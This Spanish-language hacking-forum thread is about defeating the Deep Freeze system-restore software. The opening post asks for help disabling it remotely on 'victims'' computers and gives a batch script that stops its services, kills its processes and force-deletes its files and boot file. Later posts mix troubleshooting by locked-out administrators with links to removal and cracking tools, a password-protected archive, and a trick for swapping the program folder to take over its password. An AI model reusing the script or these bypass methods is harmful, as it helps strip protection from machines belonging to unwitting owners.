Tema destacado: Únete al Grupo Steam elhacker.NET
Autor
|
Tema: DEEP FREEZE (Leído 344,270 veces)
|
-The Nax-
~▬-The Nax- is here▬~
|
Hola a todos, bueno hace bastante que intento destruir deep freeze jaja.. y no puedo, por que alguans victimas que tenia, en su computadora tenian esta *****, y mi pregunta es si es probable deshabilitarlo con algun codigo de batch. Hice uno pero no se a ver si algunos que sepan que me lo diga si esta bien, mi problema es que lo tengo que deshabilitar remotamente que mucho mas dificil. ja..
Codigo: @echo off If exist "%ProgramFiles%\Faronics\Deep Freeze" (goto faronics) else (goto 1) :1 goto fin :faronics net stop "DF5Serv" net stop "DeepFrz" Taskkill /f /IM DF5Serv.exe /IM FrzState2k.exe /IM DFServEx.exe /IM FrzState.exe cd C.\ attrib -H -S -R WINBOOT.INI del WINBOOT.INI cd C:\Archivos de programa\Faronics\Deep Freeze attrib -H -S -R *.* del /s /q *.* exit
Espero su ayuda, Saludos,
|
|
|
|
|
|
|
|
|
zuma79
|
Les comento lo que me pasa  tengo varias computadoras con el deep freeze instalado y al paracer trabajaban bien. fue entonces cuando descargue absolutamente todas las actualizaciones de Microsoft (Porque lo puedo hacer), y porsupuesto desactive el DF. entonces ya que quise volver a congelar mi unidad PEEEELASSS....QUE YA NO JALA SOLO SE QUEDABA CONGELADA.....entonces lo desinsrale...y lo reinstale...pensando que esto me podria ayudar a corregir alguna configuracion o algo pero.....ahora no solo no puedo poner la contraseña y no que tampoco me deja desinstalarlo y no hayo que hacer......en este foro encontre la siguiente liga http://www.ulises2k.com.ar/programas/index.php ...misma que probare...espero que algo pueda hacer y lo que salga les comentare.... mi sistema es XP SP2 completamente actualizado al dia de hoy. Gracias por los consejos amigos
|
|
|
|
|
|
|
|
|
zuma79
|
Pues...ahora si que estoy en broncas....de plano no se dejo.....corri el que se supone es un cd para bootear con el pero nada....dice que supuestamente lo quita pero al reiniciar simplemente sigue igual.......  caray......ahorasi que estoy en problemas......si no encuentro algo pronto tendre que darle foprmato y empezar desde cero a 6 MAQUINAS¡¡¡¡¡ SI ASI SOY DE TONTO.....BUENO seguyiremos buscando haber quetal.. suerte a los que tienen el mismo problema que yo (no el de mi coeficiente intelectual) sino el de el df..je.. bye si encuentro algo se los comunicare
|
|
|
|
|
|
|
|
|
zuma79
|
POR FIN....¡¡¡¡¡¡¡....ENCONTRE ALGO QUE ME FUNCIONO.......AQUI LES VA LA INDICACION: 1.- Descargar el programa que te permite desactivar y por tanto desinstalar el DF. 2.- Descargar el manual de uso. Les cuanto mi experiencia: Tenia el problema de que al actualizar mi pc con el Windowes update y querer reactivar la proteccion del DF simplemente me dejava colgado y no me permitia hacer absolutamente nada. Comente que en un caso me dejo desinstalarlo y con una nueva instalacion me hacia lo mismo. aunque ahora nisiquiera lo podia desactivar....eso me estaba frustrando. pero ahora les cuento Entre en modo Seguro sin funciones de red a mi maquina y ejecute el programa, defini la ruta del ejecutable del DF y cambie su estado..ME LO PERMITIO¡¡¡¡QUE EMOCION.....despues simplemente reinicie mi maquina y Gualaaa.....ya estaba desactivado y por tanto apto para la desinstalacion. cabe enfatizar que yo corria la version 4.20.020.0598 en mi maquina y ahora hare la prueba con una mas actual haber si cpon ello corrijo mi problema original que fue el de mantener al 100% de actualizaciones mis maquinas con el windows update. dejo las ligas mis amigos: http://usuarios.arnet.com.ar/fliamarconato/pages/DeepUnfreezer1.6.exe programa http://usuarios.arnet.com.ar/fliamarconato/pages/smanual.html manual Cualquier comentario estoy a sus ordenes seguire informandoles 
|
|
|
|
|
|
|
|
|
zuma79
|
ME MUERO DEL CORAJE........ RECUERDAN QUE LES COMENTE QUE HABIA SOLUCIONADO MI PROBLEMA CON EL DEEP f ...PUES AL INSTALAR LA VERSION 6 ME HIZO EXACTAMENTE LO MSIMO PERO AHORA LA HERRAMIENTA QUE ME FUNCIONO EN UN PRINCIPIO SIMPLEMENTE NO JALA...ESTOY FURIOSO....Y SI NO ENCUENTRO ALGO PRONTO TENDRE QUE EMPEZAR DE CERO CON ESA MAQUINA...
BUENO...HAY LES COMENTARE LO QUE SUCEDA.... Ç POR CIERTO....LO MAS CURIOSO ESQUE TENGO UNA MAQUINA CON LA VERSION ANTERIOR FUNCIONANDO PERFECTAMENTE CON EL DEEP FREER...ESTOY DESCONCERTADO.....NO SE QUE SEA
BUENO....NOS VEMOS
|
|
|
|
|
|
|
|
|
|
|
jdc
janito dos cuatro...
|
Hay un programa que se llama "fuck deep freeze" que deja en blanco la clave juego presionan control, alt, shif y f6 y descongelan je je una vez que reinicia (descongelado) ya se pueden cancelar los procesos (frstate y el otro que no me acuerdo) luego...
|
|
|
|
|
|
|
|
|
jdc
janito dos cuatro...
|
... pueden eliminar la carpeta c:/archivos de programa/hyper technologies y reemplazarla por una que hayan copiado de otro pc pero que ustedes conozcan la clave y queda con su propia clave je je je espero que les sirva, lo mismo para la gente que tenga...
|
|
|
|
|
|
|
|
|
|
|
zuma79
|
Fijense que expuse mi problema a un colega comentandole mis problemas y le comente lo que creia que era.. (les recuerdo que suponia que era alguna actualizacion de windows o el antivirus)....y pues me dijo que el tuvo el mismo problema y, hoy dia lo asociamos al NOD32 que es el antivirus que tenemos instalado en nuestras maquinas. el me dijo que lo desinstalo e instalo el Karspesky y al instalar nuevamente el deep no tuvo mayor problema...esto, aclaro, lo hizo despues de formatear desde cero la maquina y dejarla cpon todas sus actualizaciones.
en concreto. Pieso que alguna actualizacion del NOD32 es la que nos esta metiendo calambres a muchos como yo con el sistema en conjuncion con las actualizaciones de WinXPSP2. hare la prueba personalmente y les comentarew como me fue.
Lo hare con la version 4.0...del Deep y con la 6.... del deep para comentarle los resultados y las diferencias
Saludos a todos los foreros
|
|
|
|
|
|
|
|
|
SATELITAL®
Solo Tu Eres El Artifice De Tu Propio Destino...
|
Mmm... hey gente espero que esto no sea tomado como Spam, y comprendan que simplemente trato de aportar una posible solucion a quienes la estuvieren necesitando... y como veo que estan correteando y complicados con DeepFreeze... aqui les comparto esta data ya que me costo un tiempito conseguir que el creador del Fuck DeepFreeze terminara esta version para las ultimas Versiones Faraonic's, les dejare una cita del Post original en Mi Foro, espero les sea de ayuda y mucha Utilidad... Anti Deep Freeze v5.0, que desinstala Versiones "Faraonics" pero por sobre todo y puntualmente por PROPIA EXPERIENCIA por que ya lo probe desde ayer para las Versiones DeepFreeze Standard v6.00.020.1523 y DeepFreeze v6.10.220.1616 ya que de la v6.00.020.1523 lo desinstale Ayer con Este Pack y a la v6.10.220.1616 Acabo de Desinstalarla, deben crear un CD Booteable con la imagen que descargan y setean la PC desde el Set de Arranque "F2" una vez alli configuran para que el Boot sea desde "CD" - "DVD" Etc... pero que no arranque de "C" que Arranque desde el "CD", una vez corriendo el soft se presentara y cargara luego les indicara la ventanita en formato "Modo Seguro" el Boton "Inicio" le dan Click a "Inicio" y alli se desplegara el Panel de Control del Soft, Configuran el tipo de SO que tienen y Listo "Eliminar Deep Freeze" y see you Guys... a Reiniciar y voilà, la PC Arranca "LIBERADA", cualquier cosa me preguntan ya que ya los ELIMINE de 3 Pc's... DESCARGA LIX.INhttp://lix.in/0cbd2135Peso en Carpeta: 150 MBPeso Comprimido: 52.2 MBFormato Pack: .RARFormato Apl: .ISOPass del .RAR: SATELITAL®Favor Respetar La Fuente: Ulises (Creador) - WWW.CULTURAHACK.COM (Credito a la Insistencia) Bueno gente espero les sea de Utilidad... Mis Saludos y Deseos de EXITOS!!!
|
|
|
|
« Última modificación: 20 Enero 2008, 21:40 por SATELITAL® »
|
|
Vive Tu Vida Como Si Fuera El Ultimo Momento y Fueras a Irte MAÑANA... Mas Planificala Como Si Jamas Fueras a Irte...  .-
|
|
|
Castillorojo
|
una vez vas molestando aqui, a machetero puedes entrar a la carpeta donde estan los archivos que no cargan y colocarlos en c:/windows/menu inicio/inicio y asi se cargara al iniciar ahora mi pregunta es la siguiente para quien este leyendo y pueda ayudarme : con el win98, win98se si funciona pero con el win2000, winxp no funciona por mas que le doy el attrib -h -r -s no se encuentra el winboot solo logre borrar el persi0.sys en win2000 y como puedo bootear sin necesidad de acceder a la bios en winXP ?? ayuudaaa....  Hola ... mi problema con el Deep Freeze es que no puedo ver el icono de la barra del reloj, no quiero desisntalar el Deep freeze por que desaparecio pero sigue funcionando (congelando) no esta el icono y no me deja mover carpetas o archivos congelados a otros lugares pq cuando reinicio me vuelven al lugar o se borran ......... intente eso de mover los archivos al menu Inicio (lo que dice Mekatroniko) pero nada se borran de ahí solo quiero saber si hay una opcion de que me salga el icono sin desinstalar deep freeze sino tendre que desistalarlo y sería mas complicado ......... (no se como ingresar al cuadro de operaciones de Deep Freeze , es decir , congelar descongelar, y eso .............mi disco esta partido en dos unidades C: y D: ,pero solo C: esta congelado ....... D: no esta congelado ........... y si me acuerdo de mi contraseña) gracias
|
|
|
|
« Última modificación: 9 Marzo 2008, 05:10 por Castillorojo »
|
|
|
|
|
gergamer
|
hola a todos como estan soy nuevo en este y deseo consultarles algo ya que veo conocen bastante del deep freezer de ante mano les doy mil gracias por cualquier ayuda que me puedan dar resulta que instale una versión que solo me duro un mes ante esto la desinstale e instale una versión mas vieja que tengo pero al hacer esto no me crea el icono en el inicio y no se como hacer para freezar o desfreezar ya intente con chif- ctrl-alt- f6 , pero no da resultado tengo un cyber cafe y en todos la versión que instale parece que se vencio por que esta desfrizada por mas que le doy freezar no lo hace aun que esto es el menor de mis problemas ya que en uno de los equipos al instalar la versión antigua que tengo me bloqueo el equipo y sale una pantalla azul que me dice que hay problemas con un software instalado y que el equipo se apaga para protegerse de daños que iniciara el bolcado de memoria como ven estoy en un lio tenas no se que hacer
att gergamer gracias por la ayuda que me puedan brindar
|
|
|
|
|
|
|
|
|
jdc
janito dos cuatro...
|
Amigo en la combinación de teclas que estas haciendo te falta el shif... Es control + alt + shif + f6 ahí te aparece el cuadro para que pongas tú clave y descongeles
|
|
|
|
|
|
|
|
|
SATELITAL®
Solo Tu Eres El Artifice De Tu Propio Destino...
|
problema con el Deep Freeze es que no puedo ver el icono de la barra del reloj, no quiero desisntalar el Deep freeze por que desaparecio pero sigue funcionando (congelando) no esta el icono y no me deja mover carpetas o archivos congelados a otros lugares pq cuando reinicio me vuelven al lugar o se borran......... intente eso de mover los archivos al menu Inicio (lo que dice Mekatroniko) pero nada se borran de ahí solo quiero saber si hay una opcion de que me salga el icono sin desinstalar deep freeze sino tendre que desistalarlo y sería mas complicado......... (no se como ingresar al cuadro de operaciones de Deep Freeze , es decir , congelar descongelar, y eso.............mi disco esta partido en dos unidades C: y D: ,pero solo C: esta congelado....... D: no esta congelado........... y si me acuerdo de mi contraseña) gracias Mmm... mira sobre el que haya desaparecido de tu Barra el Icono te dire que la falla corresponde a que en algun momento o por algun Adware, o Mala Instalacion o Desinstalacion tu Reloj del Setup se desconfiguro... y deberias revisarlo cuando arranca con "F2" o "Ctrl" "Sup" o "F2" "Sup" segun sea el modelo, marca, config Etc. bien una vez en el Setup de la Pc configuras la hora, eso por un lado y por el otro alli te respondieron que la combinacion de teclas es "Ctrl" "Alt" "Shift" "F6" una vez que abrio Deep Freeze le das el pass si es que lo Tuviere... muchas veces cuando probamos y te lo digo por XP que di vueltas como 1 semana con mi primer Deep y resulta que "jamas" le habia puesto password  , prueba con solo Aceptar sin poner nada en Pass y bueh si no funca ahi si dale el pass si estas seguro que es el que tienes, ahora segun la version del Deep que tangas es la medicina que se le puede poner... una de ellas es el "Fuck Deep Freeze 4.2.2" y la que le sigue es el "Fuck Deep Freeze v4.3.0" y claro esta que traje que es la Ultima... y sirve para las versiones "6.30.020.1818" y un par mas, solo booteas con este cd y listo eliminas de raiz el Deep... espero te sirva la ref y bueh puedas solucionar tu problema, Mis Saludos y Deseos de EXITOS!!!  .-
|
|
|
|
« Última modificación: 2 Abril 2008, 07:13 por SATELITAL® »
|
|
Vive Tu Vida Como Si Fuera El Ultimo Momento y Fueras a Irte MAÑANA... Mas Planificala Como Si Jamas Fueras a Irte...  .-
|
|
|
|
|